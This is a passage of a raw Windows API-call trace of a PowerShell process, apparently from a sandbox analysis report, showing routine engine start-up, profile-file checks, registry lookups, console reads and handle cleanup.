lpBuffer=0x1ac230*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad978 | out: phkResult=0x1ad978*=0x348) returned 0x0 [0077.477] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8fc, lpData=0x0, lpcbData=0x1ad8f8*=0x0 | out: lpType=0x1ad8fc*=0x1, lpData=0x0, lpcbData=0x1ad8f8*=0x56) returned 0x0 [0077.477] CoTaskMemAlloc (cb=0x5a) returned 0x48c9b0 [0077.477] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8cc, lpData=0x48c9b0, lpcbData=0x1ad8c8*=0x56 | out: lpType=0x1ad8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad8c8*=0x56) returned 0x0 [0077.477] CoTaskMemFree (pv=0x48c9b0) [0077.477] RegCloseKey (hKey=0x348) returned 0x0 [0077.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad978 | out: phkResult=0x1ad978*=0x348) returned 0x0 [0077.477] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8fc, lpData=0x0, lpcbData=0x1ad8f8*=0x0 | out: lpType=0x1ad8fc*=0x1, lpData=0x0, lpcbData=0x1ad8f8*=0x56) returned 0x0 [0077.477] CoTaskMemAlloc (cb=0x5a) returned 0x48c9b0 [0077.477] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8cc, lpData=0x48c9b0, lpcbData=0x1ad8c8*=0x56 | out: lpType=0x1ad8cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad8c8*=0x56) returned 0x0 [0077.478] CoTaskMemFree (pv=0x48c9b0) [0077.478] RegCloseKey (hKey=0x348) returned 0x0 [0077.478] CoTaskMemAlloc (cb=0x20c) returned 0x473030 [0077.478] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x473030 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0077.478] CoTaskMemFree (pv=0x473030) [0077.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0077.478] CoTaskMemAlloc (cb=0x20c) returned 0x473030 [0077.478] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x473030 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0077.478] CoTaskMemFree (pv=0x473030) [0077.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0077.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0077.480] SetErrorMode (uMode=0x1) returned 0x1 [0077.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad8e0 | out: lpFileInformation=0x1ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.480] SetErrorMode (uMode=0x1) returned 0x1 [0077.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0077.481] SetErrorMode (uMode=0x1) returned 0x1 [0077.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad8e0 | out: lpFileInformation=0x1ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.481] SetErrorMode (uMode=0x1) returned 0x1 [0077.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0077.481] SetErrorMode (uMode=0x1) returned 0x1 [0077.481] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad8e0 | out: lpFileInformation=0x1ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.481] SetErrorMode (uMode=0x1) returned 0x1 [0077.482] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0077.482] SetErrorMode (uMode=0x1) returned 0x1 [0077.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad8e0 | out: lpFileInformation=0x1ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.482] SetErrorMode (uMode=0x1) returned 0x1 [0077.483] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.483] CoTaskMemFree (pv=0x3e4a20) [0077.493] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0077.500] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0077.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0077.507] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0077.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0077.509] ReadFile (in: hFile=0xe4, lpBuffer=0x2d1d2d0, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x1ad738, lpOverlapped=0x0 | out: lpBuffer=0x2d1d2d0*, lpNumberOfBytesRead=0x1ad738*=0x75, lpOverlapped=0x0) returned 1 [0077.515] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0077.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0077.516] CloseHandle (hObject=0xf) returned 1 [0077.519] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.519] CoTaskMemFree (pv=0x3e4a20) [0077.521] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.521] CoTaskMemFree (pv=0x3e4a20) [0077.524] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.524] CoTaskMemFree (pv=0x3e4a20) [0077.527] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.527] CoTaskMemFree (pv=0x3e4a20) [0077.533] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.534] CoTaskMemFree (pv=0x3e4a20) [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x348 [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3cc [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370 [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0 [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0077.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8 [0077.537] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac [0077.537] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b0 [0077.537] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d0 [0077.537] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0077.540] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.540] CoTaskMemFree (pv=0x3e4a20) [0077.545] SetEvent (hEvent=0x398) returned 1 [0077.545] SetEvent (hEvent=0x348) returned 1 [0077.546] SetEvent (hEvent=0x3cc) returned 1 [0077.546] SetEvent (hEvent=0x370) returned 1 [0077.546] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0077.548] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.548] CoTaskMemFree (pv=0x3e4a20) [0077.550] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad778 | out: phkResult=0x1ad778*=0x3bc) returned 0x0 [0077.550] RegQueryValueExW (in: hKey=0x3bc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad6fc, lpData=0x0, lpcbData=0x1ad6f8*=0x0 | out: lpType=0x1ad6fc*=0x0, lpData=0x0, lpcbData=0x1ad6f8*=0x0) returned 0x2 [0093.689] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0093.700] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0093.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0093.708] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0093.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0093.709] ReadFile (in: hFile=0xe4, lpBuffer=0x2d1d2d0, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x1ad738, lpOverlapped=0x0 | out: lpBuffer=0x2d1d2d0*, lpNumberOfBytesRead=0x1ad738*=0x6, lpOverlapped=0x0) returned 1 [0093.722] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0093.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x1ad8c0 | out: lpConsoleScreenBufferInfo=0x1ad8c0) returned 1 [0093.724] CloseHandle (hObject=0xf) returned 1 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3bc [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0093.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378 [0093.726] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0093.726] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0093.726] SetEvent (hEvent=0x35c) returned 1 [0093.726] SetEvent (hEvent=0x3bc) returned 1 [0093.726] SetEvent (hEvent=0x354) returned 1 [0093.726] SetEvent (hEvent=0x350) returned 1 [0093.726] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384 [0093.727] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad778 | out: phkResult=0x1ad778*=0x388) returned 0x0 [0093.727] RegQueryValueExW (in: hKey=0x388, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad6fc, lpData=0x0, lpcbData=0x1ad6f8*=0x0 | out: lpType=0x1ad6fc*=0x0, lpData=0x0, lpcbData=0x1ad6f8*=0x0) returned 0x2 [0093.828] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0093.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.828] CoTaskMemFree (pv=0x3e4a20) [0093.836] SetEvent (hEvent=0x33c) returned 1 [0093.837] CoTaskMemAlloc (cb=0x804) returned 0x1b3f4d20 [0093.837] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f4d20, nSize=0x1ad948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad948) returned 0x1 [0093.837] CoTaskMemFree (pv=0x1b3f4d20) [0093.838] CoTaskMemAlloc (cb=0x204) returned 0x432e90 [0093.838] GetUserNameW (in: lpBuffer=0x432e90, pcbBuffer=0x1ad988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad988) returned 1 [0093.838] CoTaskMemFree (pv=0x432e90) [0093.839] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fed358*="Stopped", lpRawData=0x2fed0e8) returned 1 [0093.840] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0093.847] CoGetContextToken (in: pToken=0x1af510 | out: pToken=0x1af510) returned 0x0 [0093.847] CObjectContext::QueryInterface () returned 0x0 [0093.847] CObjectContext::GetCurrentThreadType () returned 0x0 [0093.847] Release () returned 0x0 [0093.850] CoGetContextToken (in: pToken=0x1af0e0 | out: pToken=0x1af0e0) returned 0x0 [0093.850] CObjectContext::QueryInterface () returned 0x0 [0093.850] CObjectContext::GetCurrentThreadType () returned 0x0 [0093.850] Release () returned 0x0 [0093.851] CoGetContextToken (in: pToken=0x1af0e0 | out: pToken=0x1af0e0) returned 0x0 [0093.852] CObjectContext::QueryInterface () returned 0x0 [0093.852] CObjectContext::GetCurrentThreadType () returned 0x0 [0093.852] Release () returned 0x0 [0093.863] CoGetContextToken (in: pToken=0x1af0e0 | out: pToken=0x1af0e0) returned 0x0 [0093.863] CObjectContext::QueryInterface () returned 0x0 [0093.863] CObjectContext::GetCurrentThreadType () returned 0x0 [0093.863] Release () returned 0x0 [0093.900] CoGetContextToken (in: pToken=0x1af0d0 | out: pToken=0x1af0d0) returned 0x0 [0093.900] CObjectContext::QueryInterface () returned 0x0 [0093.900] CObjectContext::GetCurrentThreadType () returned 0x0 [0093.900] Release () returned 0x0 [0093.902] CoUninitialize () Thread: id = 9 os_tid = 0x730 Thread: id = 10 os_tid = 0x78c Thread: id = 11 os_tid = 0x60c Thread: id = 12 os_tid = 0x10c Thread: id = 13 os_tid = 0x208 [0068.805] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0073.662] LocalFree (hMem=0x3ea810) returned 0x0 [0073.662] CloseHandle (hObject=0x334) returned 1 [0073.662] CloseHandle (hObject=0x13) returned 1 [0073.663] CloseHandle (hObject=0xf) returned 1 [0073.663] RegCloseKey (hKey=0x320) returned 0x0 [0073.664] RegCloseKey (hKey=0x31c) returned 0x0 [0073.664] RegCloseKey (hKey=0x318) returned 0x0 [0073.664] LocalFree (hMem=0x3ea7e0) returned 0x0 [0073.664] RegCloseKey (hKey=0x348) returned 0x0 [0077.262] RegCloseKey (hKey=0x3c8) returned 0x0 [0077.263] RegCloseKey (hKey=0x390) returned 0x0 [0077.263] RegCloseKey (hKey=0x38c) returned 0x0 [0077.263] RegCloseKey (hKey=0x388) returned 0x0 [0077.263] RegCloseKey (hKey=0x384) returned 0x0 [0077.264] RegCloseKey (hKey=0x380) returned 0x0 [0077.264] RegCloseKey (hKey=0x37c) returned 0x0 [0077.264] RegCloseKey (hKey=0x378) returned 0x0 [0077.264] RegCloseKey (hKey=0x374) returned 0x0 [0077.265] RegCloseKey (hKey=0x3c4) returned 0x0 [0077.265] RegCloseKey (hKey=0x364) returned 0x0 [0077.265] RegCloseKey (hKey=0x360) returned 0x0 [0077.266] RegCloseKey (hKey=0x35c) returned 0x0 [0077.266] RegCloseKey (hKey=0x358) returned 0x0 [0077.266] RegCloseKey (hKey=0x354) returned 0x0 [0077.266] RegCloseKey (hKey=0x350) returned 0x0 [0077.267] RegCloseKey (hKey=0x34c) returned 0x0 [0077.267] RegCloseKey (hKey=0x334) returned 0x0 [0077.267] RegCloseKey (hKey=0x3c0) returned 0x0 [0077.267] RegCloseKey (hKey=0x31c) returned 0x0 [0077.267] RegCloseKey (hKey=0x318) returned 0x0 [0077.268] RegCloseKey (hKey=0x3bc) returned 0x0 [0077.268] RegCloseKey (hKey=0x3b8) returned 0x0 [0077.268] RegCloseKey (hKey=0x394) returned 0x0 [0077.268] RegCloseKey (hKey=0x3d0) returned 0x0 [0077.269] RegCloseKey (hKey=0x3b0) returned 0x0 [0077.269] RegCloseKey (hKey=0x3ac) returned 0x0 [0077.269] RegCloseKey (hKey=0x3a8) returned 0x0 [0077.269] RegCloseKey (hKey=0x3a4) returned 0x0 [0077.270] RegCloseKey (hKey=0x3a0) returned 0x0 [0077.270] RegCloseKey (hKey=0x39c) returned 0x0 [0077.270] RegCloseKey (hKey=0x398) returned 0x0 [0077.270] RegCloseKey (hKey=0x370) returned 0x0 [0077.271] RegCloseKey (hKey=0x3cc) returned 0x0 [0077.271] RegCloseKey (hKey=0x348) returned 0x0 [0093.031] CloseHandle (hObject=0x17) returned 1 [0093.032] CloseHandle (hObject=0x13) returned 1 [0093.032] CloseHandle (hObject=0xf) returned 1 [0093.033] RegCloseKey (hKey=0x3bc) returned 0x0 [0093.033] CloseHandle (hObject=0x1b) returned 1 [0093.855] LocalFree (hMem=0x3e4910) returned 0x0 [0093.855] LocalFree (hMem=0x3e4800) returned 0x0 [0093.864] DeregisterEventSource (hEventLog=0x1b860008) returned 1 [0093.884] RegCloseKey (hKey=0x388) returned 0x0 [0093.884] CloseHandle (hObject=0x384) returned 1 [0093.885] CloseHandle (hObject=0x380) returned 1 [0093.885] CloseHandle (hObject=0x37c) returned 1 [0093.885] CloseHandle (hObject=0x378) returned 1 [0093.886] CloseHandle (hObject=0x374) returned 1 [0093.886] CloseHandle (hObject=0x3c4) returned 1 [0093.886] CloseHandle (hObject=0x364) returned 1 [0093.887] CloseHandle (hObject=0x360) returned 1 [0093.887] CloseHandle (hObject=0x358) returned 1 [0093.887] CloseHandle (hObject=0x35c) returned 1 [0093.888] CloseHandle (hObject=0x350) returned 1 [0093.888] CloseHandle (hObject=0x3b8) returned 1 [0093.888] CloseHandle (hObject=0x394) returned 1 [0093.889] CloseHandle (hObject=0x3d0) returned 1 [0093.889] CloseHandle (hObject=0x3b0) returned 1 [0093.889] CloseHandle (hObject=0x3ac) returned 1 [0093.889] CloseHandle (hObject=0x3a8) returned 1 [0093.890] CloseHandle (hObject=0x3a4) returned 1 [0093.890] CloseHandle (hObject=0x3a0) returned 1 [0093.890] CloseHandle (hObject=0x39c) returned 1 [0093.891] CloseHandle (hObject=0x398) returned 1 [0093.891] CloseHandle (hObject=0x370) returned 1 [0093.891] CloseHandle (hObject=0x3cc) returned 1 [0093.892] CloseHandle (hObject=0x348) returned 1 [0093.892] CloseHandle (hObject=0x354) returned 1 [0093.892] CloseHandle (hObject=0x3bc) returned 1 [0093.893] CloseHandle (hObject=0x1b) returned 1 [0093.893] CloseHandle (hObject=0x338) returned 1 [0093.894] UnmapViewOfFile (lpBaseAddress=0x2a90000) returned 1 [0093.895] UnmapViewOfFile (lpBaseAddress=0x2c50000) returned 1 [0093.895] CloseHandle (hObject=0x17) returned 1 [0093.896] CloseHandle (hObject=0x13) returned 1 [0093.897] CloseHandle (hObject=0x33c) returned 1 [0093.897] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0093.898] CloseHandle (hObject=0x300) returned 1 [0093.898] CloseHandle (hObject=0x344) returned 1 Thread: id = 14 os_tid = 0x23c [0077.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0077.565] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0077.571] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.571] CoTaskMemFree (pv=0x3e4a20) [0077.574] VirtualQuery (in: lpAddress=0x1c68d8c0, lpBuffer=0x1c68e780, dwLength=0x30 | out: lpBuffer=0x1c68e780*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.579] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.579] CoTaskMemFree (pv=0x3e4a20) [0077.583] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.584] CoTaskMemFree (pv=0x3e4a20) [0077.587] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.587] CoTaskMemFree (pv=0x3e4a20) [0077.599] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.599] CoTaskMemFree (pv=0x3e4a20) [0077.602] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.602] CoTaskMemFree (pv=0x3e4a20) [0077.604] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.604] CoTaskMemFree (pv=0x3e4a20) [0077.610] VirtualQuery (in: lpAddress=0x1c68db70, lpBuffer=0x1c68ea30, dwLength=0x30 | out: lpBuffer=0x1c68ea30*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, 